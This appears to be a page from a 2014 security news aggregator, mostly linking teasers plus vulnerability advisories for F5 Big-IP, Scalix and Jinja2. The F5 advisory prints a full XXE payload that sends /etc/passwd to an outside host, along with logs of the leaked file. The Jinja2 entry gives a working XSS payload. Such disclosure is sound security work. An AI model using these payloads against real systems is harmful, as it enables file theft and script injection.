Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

CVE-2014-6033 - XML External Entity Injection in F5 Networks Big-IP

$
0
0
Vulnerability title: XML External Entity Injection in F5 Networks Big-IP
CVE: CVE-2014-6033
Vendor: F5 Networks
Product: Big-IP
Affected version: 11.3.0.39.0
Fixed version: N/A
Reported by: Oliver Gruskovnjak

Details:

F5 Networks Big-IP is vulnerable to an XML External Entity injection attack. The following xml payload was used to trigger the XXE (The vulnerable URL is redacted due to the number of affected systems):

action=write&contents=<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;
%int;
%trick;]><viewList>
  <view id="asd">
    <window>
      <setting name="x" value="0"/>
      <setting name="height" value="256"/>
      <setting name="y" value="190"/>
      <setting name="typeId" value="BwControlTemplWindow"/>
      <setting name="selectedMode" value="Both"/>
      <setting name="width" value="508"/>
    </window>
    <window>
      <setting name="x" value="515"/>
      <setting name="height" value="256"/>
      <setting name="toggleOn" value="true"/>
      <setting name="y" value="0"/>
      <setting name="typeId" value="MemWindow"/>
      <setting name="selectedMode" value="Both"/>
      <setting name="width" value="508"/>
      <setting name="viewSwitch" value="false"/>
    </window>
  </view>
</viewList>&name=asdasd


Please note that the payload needs to be completely urlencoded to trigger the vulnerability properly. On the attacking Server the file can be read from web server logs:


10.1.10.10 - - [20/Aug/2014 00:37:18] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128 0.0008
10.1.10.10 - - [20/Aug/2014:00:37:18 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128
- -> /xml?f=/etc/passwd
10.1.10.10 - - [20/Aug/2014 00:37:18] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f
 5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0010



Further details at:

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6033/

Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company,
registered in England in accordance with the Companies
Act under number 02763799. The registered office
address of Portcullis Computer Security Limited is:
Portcullis House, 2 Century Court, Tolpits Lane, Watford,
United Kingdom, WD18 9RS.
The information in this email is confidential and may be
legally privileged. It is intended solely for the addressee.
Any opinions expressed are those of the individual and
do not represent the opinion of the organisation. Access
to this email by persons other than the intended recipient
is strictly prohibited.
If you are not the intended recipient, any disclosure,
copying, distribution or other action taken or omitted to be
taken in reliance on it, is prohibited and may be unlawful.
When addressed to our clients any opinions or advice
contained in this email is subject to the terms and
conditions expressed in the applicable Portcullis Computer
Security Limited terms of business.
###############################################################

#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared
by MailMarshal.
#####################################################################################

Cybercriminals create platform for automating rogue credit card charges

$
0
0
The developers claim it can emulate human interaction to trick payment gateways

more here.........http://www.pcadvisor.co.uk/news/security/3583313/cybercriminals-create-platform-for-automating-rogue-credit-card-charges/

Scan for shellshock with wfuzz

$
0
0
In the last few weeks everyone has been talking about Shellshock, the vulnerability affecting bash and having security ramifications everywhere, from Web, DHCP or SSH servers to mail servers. It does not have any sense to extend this post trying to rehash what this vulnerability is about or why it is an issue, as by now there are thousands of other posts and articles about the Bash “Shellshock” vulnerability, you only have to do a quick search on the Internet.

The best way to test for the Shellshock vulnerability is to do a local check but if you are worried about your web server hosting a vulnerable /cgi-bin and you don't have shell access, there are plenty of free Shellshock on-line scanner tools such as

more here..........http://edge-security.blogspot.com/2014/10/scan-for-shellshock-with-wfuzz.html

Give me any zero-day and I will rule the world

$
0
0
A few months ago, I was having lunch at a favorite Italian restaurant in Washington, DC. I work in a residential area, which means lunch time is slow and there’s no crowd. This leads to many conversations with the staff. This particular conversation drifted to Time Magazine’s July World War Zero article about the sale of zero-day exploits.

What a strange world we live in. Zero-days are now common lunch conversation almost along the lines of talking about the weather.

more here.......http://blog.cobaltstrike.com/2014/10/30/give-me-any-zero-day-and-i-will-rule-the-world/

Reflected File Download - A New Web Attack Vector

$
0
0
On October 2014 as part of my talk at the Black Hat Europe 2014 event, I presented a new web attack vector that enables attackers to gain complete control over a victim’s machine by virtually downloading a file from trusted domains. I decided to call this technique Reflected File Download (RFD), as malware can be "downloaded" from highly trusted domains such as Google.com and Bing.com without ever being uploaded.

more here.........http://blog.spiderlabs.com/2014/10/reflected-file-download-the-white-paper.html

Mac OS X local privilege escalation (IOBluetoothFamily)

$
0
0
Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods, including ASLR, NX, various heap protections, stack canaries, and sandboxed execution. As a natural consequence, instead of extricating themselves with such a plethora of defensive methods, attackers prefer to take the “easy” way and started to move at the kernel-level, where sophisticated protection techniques are still not very common (indeed, things like as KASLR and SMEP are implemented only in the latest versions of the most popular OSes). This trend is also confirmed by the rising number of kernel-level vulnerabilities reported in the last few months in Windows, Linux, and OS X.

more here........http://joystick.artificialstudios.org/

HTTP PUBLIC-KEY-PINNING EXPLAINED

$
0
0
In my last post “Deploying TLS the hard way” I explained how TLS and its extensions (as well as a few HTTP extensions) work and what to watch out for when enabling TLS for your server. One of the HTTP extensions mentioned is HTTP Public-Key-Pinning (HPKP). As a short reminder, the header looks like this

more here........https://timtaubert.de/blog/2014/10/http-public-key-pinning-explained/

Paper: Printed Circuit Board Deconstruction Techniques

$
0
0
The primary purpose of printed circuit board (PCB) reverse engineering is to determine electronic system or subsystem functionality by analyzing how components are interconnected. We performed a series of experiments using both inexpensive home-based solutions and state-of-the-art technologies with a goal of removing exterior coatings and accessing individual PCB layers. This paper presents our results from the most effective techniques.

more here..........https://www.usenix.org/system/files/conference/woot14/woot14-grand.pdf

Roll Your Own IP Attack Graphs with IPew

$
0
0
Are you:

A security vendor feeling inadequate because you don’t have your own “live attack graph”?
A SOC manager who needs to distract/impress visitors and/or executives with an “ooh, shiny!” display?
A researcher who wants to draw attention to your project but just don’t have the time to dedicate to inane animated visualizations?
If so, then IPew is for you!

more here.........http://datadrivensecurity.info/blog/posts/2014/Oct/roll-your-own-ip-attack-graphs/

Android/Emmental: adding cheese in emmental holes

$
0
0
This is a follow up post on Operation Emmental. If you are not aware of Emmental, please read this white paper, and our previous blog post.

more here.........http://blog.fortinet.com/post/android-emmental-adding-cheese-in-emmental-holes

SEC Consult SA-20141031-0 :: XML External Entity Injection (XXE) and Reflected XSS in Scalix Web Access

$
0
0
SEC Consult Vulnerability Lab Security Advisory < 20141031-0 >
=======================================================================
              title: XML External Entity Injection (XXE) and Reflected XSS
            product: Scalix Web Access
 vulnerable version: 11.4.6.12377 and 12.2.0.14697
      fixed version: -
             impact: Critical
           homepage: http://www.scalix.com/
              found: 2014-08-27
                 by: R. Giruckas, A. Kolmann
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Employees need to access their email from wherever they happen to be – on the
road, at customer sites, remote offices, and at home. Users who need remote
access to their email often include customer-facing sales and support
personnel, who need to stay connected and informed to be responsive to
customers. The problem is, most web clients have slow performance and limited
functionality. Scalix Web Access is different. It is an AJAX-based web client
that delivers the look and feel, usability and performance of a desktop
 application."

Source: http://www.scalix.com/communityedition-scalixwebaccess


Business recommendation:
------------------------
By exploiting the XXE vulnerability, an unauthenticated attacker can get
read access to the filesystem of the Scalix Mail Server host and thus obtain
sensitive information such as the configuration files, etc.
It is also possible to scan ports of the internal hosts and cause DoS on
the affected host.


Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection
The used XML parser is resolving external XML entities which allows attackers
to read files and send requests to systems on the internal network (e.g port
scanning). The risk of this vulnerability is highly increased by the fact
that it can be exploited by anonymous users without existing user accounts.

2) Reflected XSS
The Scalix mail administration login panel is prone to the reflected cross site
scripting attacks. The vulnerability can be used to include HTML or JavaScript
code to the affected web page. The code is executed in the browser of users
if they visit the manipulated URL.


Proof of concept:
-----------------
The proof of concept information has been removed from this advisory as the
vendor failed to respond within 50 days and no patch is available.


1) XML External Entity Injection
The unauthenticated XML External Entity Injection vulnerability can be
exploited by issuing a specially crafted HTTP POST request to the [removed]
handler.


2) Reflected XSS
The supplied parameter value in the [removed] script is reflected without
proper validation and executed in the context of the web browser.


Vulnerable / tested versions:
-----------------------------
The XXE vulnerability has been verified to exist in the Scalix Web Access
version 11.4.6.12377 and 12.2.0.14697.

The reflected XSS vulnerability has been verified to exist in the Scalix Web Access
version 11.4.6.12377. Version 12 has not been tested against XSS.


Vendor contact timeline:
------------------------
2014-09-11: Contacting vendor through info@scalix.com, requesting encryption
            keys and attaching responsible disclosure policy
2014-10-13: No response so far, hence trying again by contacting vendor
            through info@scalix.com
2014-10-28: No response so far, hence trying again by contacting vendor
            through info@scalix.com
2014-10-31: SEC Consult releases security advisory


Solution:
---------
None available.


Workaround:
-----------
There is no workaround known other than to disable Scalix Web Access until a
thorough security review has been performed and patches are available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF A. Kolmann / @2014

Jinja2 2.0 /utils.py urlize vulnerability

$
0
0
.::Jinja2 2.0 /utils.py urlize vulnerability::.

                    We enjoy hacking of life in day and night.

                _______________________________________________

                  [+] HSID: FF000-HSDB-0005
                  [+] Author: Evi1m0 <evi1m0.bat#gmail.com>
                  [+] Team: FF0000 TEAM <http://www.ff0000.cc>
                  [+] From: HackerSoul <http://www.hackersoul.com>
                  [+] Create: 2014-10-31
                _______________________________________________


                                  -= Main =-

1. Jinja2

Jinja2(http://jinja.pocoo.org/)是基于python的模板引擎,功能比较类似于于PHP的smarty,J2ee的Freemarker和velocity。 它能完全支持unicode,并具有集成的沙箱执行环境,应用广泛。

2. Description

问题出现在Jinja2(https://github.com/mitsuhiko/jinja2/tree/2.0) 2.0版本中,其中对urlize处理不当导致模板层使用处存在跨站脚本漏洞的产生。

3. Vulnerability

漏洞文件 /jinja2/utils.py 157-198:

-------
def urlize(text, trim_url_limit=None, nofollow=False):
    """Converts any URLs in text into clickable links. Works on http://,
    https:// and www. links. Links can have trailing punctuation (periods,
    commas, close-parens) and leading punctuation (opening parens) and
    it'll still do the right thing.

    If trim_url_limit is not None, the URLs in link text will be limited
    to trim_url_limit characters.

    If nofollow is True, the URLs in link text will get a rel="nofollow"
    attribute.
    """
    trim_url = lambda x, limit=trim_url_limit: limit is not None \
                         and (x[:limit] + (len(x) >=limit and '...'
                         or '')) or x
    words = _word_split_re.split(text)
    nofollow_attr = nofollow and ' rel="nofollow"' or ''
    for i, word in enumerate(words):
        match = _punctuation_re.match(word)
        if match:
            lead, middle, trail = match.groups()
            if middle.startswith('www.') or (
                '@' not in middle and
                not middle.startswith('http://') and
                len(middle) > 0 and
                middle[0] in string.letters + string.digits and (
                    middle.endswith('.org') or
                    middle.endswith('.net') or
                    middle.endswith('.com')
                )):
                middle = '<a href="http://%s"%s>%s</a>' % (middle,
                    nofollow_attr, trim_url(middle))
            if middle.startswith('http://') or \
               middle.startswith('https://'):
                middle = '<a href="%s"%s>%s</a>' % (middle,
                    nofollow_attr, trim_url(middle))
            if '@' in middle and not middle.startswith('www.') and \
               not ':' in middle and _simple_email_re.match(middle):
                middle = '<a href="mailto:%s">%s</a>' % (middle, middle)
            if lead + middle + trail != word:
                words[i] = lead + middle + trail
    return u''.join(words)
-------

words = _word_split_re.split(text) 对传值text进行简单的正则处理,_word_split_re = re.compile(r'(\s+)')。

随后words进入循环for i, word in enumerate(words)处理后return u''.join(words)。


4. demo

views.py:
def testtest(request):
    text = request.GET['bb2']
    return render(request, 'test.html', {'text': text})

temp.html:
    {{ text | urlize }}


GET: http://localhost/?bb2=test@beebeeto.com"/onmouseover=alert(1)//


django views.py print:

Django version 1.6.1, using settings 'fuzzing.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
[u'<a href="mailto:test@beebeeto.com"/onmouseover=alert(1)//">test@beebeeto.com"/onmouseover=alert(1)//</a>']


5. fix
Update


                                  -= END =-


Source link: http://www.hackersoul.com/post/jinja2_2_0_urlize_vulnerability.html

Cuckoo Sandbox API with Apache

$
0
0
This is yet another short Cuckoo post.

If you would like to quickly get the Cuckoo API to work with Apache this one is for you.

You can have both the API and the Web Interface configuration in the same webserver config.

more here.........http://blog.prowling.nu/2014/10/cuckoo-sandbox-api-with-apache.html

Microsoft EMET - Armor against zero-days bypassed again | Conference Slides

$
0
0
New methods make it possible to circumvent protection mechanisms of Microsoft EMET 5.0

more here.........http://blog.sec-consult.com/2014/10/microsoft-emet-armor-against-zero-days.html

CVE-2014-1761 – The Alley of Compromise

$
0
0
A significant fraction of targeted attacks involve spear phishing emails with malicious lure documents that, when opened, exploit a vulnerability in the document viewer application to invoke a backdoor executable. As such, it does not come as a big surprise that exploits for CVE-2014-1761, a recent vulnerability in Microsoft Word, made their way into the toolkit of multiple adversaries. In this blog post, we provide an overview of how and when these groups started to leverage this new vulnerability in their campaigns.

more here...........http://blog.crowdstrike.com/cve-2014-1761-alley-compromise/

California Data Breach Report

$
0
0
In this report, Attorney General Kamala D. Harris presents findings and recommendations
based on a review of the 167 breaches reported in 2013 and on the full set of 298 breaches
reported since 2012.

more here.........http://oag.ca.gov/sites/all/files/agweb/pdfs/privacy/2014data_breach_rpt.pdf

DHCPSnoop

$
0
0
DHCPSnoop will listen on a network interface for DHCP replies from it's own DHCP requests and any other requests it can see during the runtime.

It will then verify the DHCP response parameters that are returned against the settings in it's configuration file.


more here........https://github.com/mgale/DHCPSnoop

[SE-2014-01] Missing patches / inaccurate information regarding Oracle Oct CPU

$
0
0
Hello All,

We've been recently informed by a 3rd party that Oracle planned to release
fixes for the vulnerabilities covered by our SE-2014-01 [1] project in Nov
2014.

We initially thought that someone mistakenly took Oct for Nov (Oracle CPU
was released on Oct 14, 2014), but the credibility of the source of this
information made us dig a little bit further into this.

As a result we found out the following.

OJVM PSU patches covering security issues in Oracle Database Java VM has not
been released in full for Windows platform.

That's regardless of the fact that Oracle blog post [2] highlighted Windows
platform as mostly affected by Java VM vulnerabilities (CVSS 9.0 Base Score
reflecting instances where a user running the database has administrative
privileges in a target OS).

Oracle Support Doc ID 1912224.1 confirmed our finding. This document specifies
November 4, 2014 as an estimated date for the release of Oracle Database Java
VM patches (Oracle calls them "post release" patches):
- Oracle JavaVM Component 12.1.0.1.1 Database PSU Patch 19801531 for Windows
- Oracle JavaVM Component 11.2.0.3.1 Database PSU Patch 19806120 for Windows
- Oracle JavaVM Component 11.1.0.7.1 Database PSU Patch 19806118 for Windows

We also found out that Oracle Support Doc ID 360870.1 [3], the one that
is usually quoted by Oracle at the time of patching security issues in Oracle
products contains misleading and inaccurate information about the impact of
Java Security Vulnerabilities on Oracle Database and Fusion Middleware products.

This in particular concerns the following excerpts:

"Oracle installations of the Java SE do not configure a browser plug-in, so it
is not possible to invoke them using a browser on the machine on which they are
installed. It is not possible for a malicious web site to download a malicious
Java applet which uses the Java SE that Oracle installs to cause harm. This is
why Java security vulnerabilities regarding applets cannot be exploited in Oracle
environments."

"The Oracle Database Server contains an embedded Java Virtual Machine implemented
by Oracle but is not the Java SE. The Java Virtual Machine is not affected by
security vulnerabilities listed in the Java SE security advisories."

Similarly, misleading and inaccurate information is also contained in Oracle
Support Doc ID 1074055.1 [4]:

"Where there are published vulnerabilities in Java, it is almost never the case
that such vulnerabilities can be exploited via Oracle applications written in
Java. Typically, such vulnerabilities can be exploited only by:
- Attackers that write Java code that is executed on browsers.
- Attackers that write Java programs that knowingly are executed by the people
  whose computing resources are being attacked.
That means, if one only runs Java applications written by trusted developers, it
is unlikely that there is any significant risk posed by Java vulnerabilities."

---

We take the update of a 1+ year old Java class base (java.version = 1.6.0_43 for
11g R2 as of Jun 2014) embedded by Oracle Database along with the commitment to
release Oracle JavaVM Component Database PSU as part of the Critical Patch Update
program starting from October 2014 [5] onwards as an indirect acknowledgment of
a Java security mess spilling beyond the usual victim (applets / browser plugin).

Thank you.

Best Regards,
Adam Gowdiak

---------------------------------------------
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
---------------------------------------------

References:
[1] SE-2014-01 Security vulnerabilities in Oracle Database Java VM
    http://www.security-explorations.com/en/SE-2014-01.html
[2] October 2014 Critical Patch Update Released

https://blogs.oracle.com/security/entry/october_2014_critical_patch_update
[3] Impact of Java SE Security Vulnerabilities on Oracle Database and Fusion Middleware Products (Doc ID 360870.1)
    Last Major Update:  Jun 9, 2014
[4] Security Vulnerability FAQ for Oracle Database and Fusion Middleware Products (Doc ID 1074055.1)
    Last Major Update:  Oct 22, 2014
[5] Oracle Recommended Patches -- "Oracle JavaVM Component Database PSU" (OJVM PSU) Patches (Doc ID 1929745.1)
    Last Major Update:  Oct 31, 2014

Setting HoneyTraps with ModSecurity: Adding Fake Cookies

$
0
0
This blog post continues with the topic of setting "HoneyTraps" within your web applications to catch attackers.

more here........http://blog.spiderlabs.com/2014/10/setting-honeytraps-with-modsecurity-adding-fake-cookies.html

Spotting Malicious Injections in Otherwise Benign Code

$
0
0
Being able to spot suspicious code, and then determine whether it is benign or malicious is a very important skill for a security researcher. Every day we scan through megabytes of HTML, JS and PHP. It’s quite easy to miss something bad, especially when it doesn’t visually stick out and follows patterns of a legitimate code.

more here.........http://blog.sucuri.net/2014/10/spotting-malicious-injections-in-otherwise-benign-code.html
Viewing all 8064 articles
Browse latest View live